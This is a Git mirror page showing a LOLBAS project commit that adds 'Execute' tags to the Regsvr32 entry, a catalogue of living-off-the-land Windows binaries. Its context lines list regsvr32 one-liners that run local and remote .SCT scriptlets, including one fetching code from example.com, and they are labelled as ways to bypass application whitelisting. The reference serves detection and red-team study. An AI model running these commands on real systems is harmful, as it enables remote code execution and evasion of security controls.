public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Adding Execute tags to most LOLBas (#405)

Browse Source
This commit is contained in:
hegusung
2024-12-29 18:31:01 +01:00
committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
129 changed files with 520 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
yml/OSBinaries/Regsvr32.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -18,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@@ -25,6 +30,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -32,6 +40,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe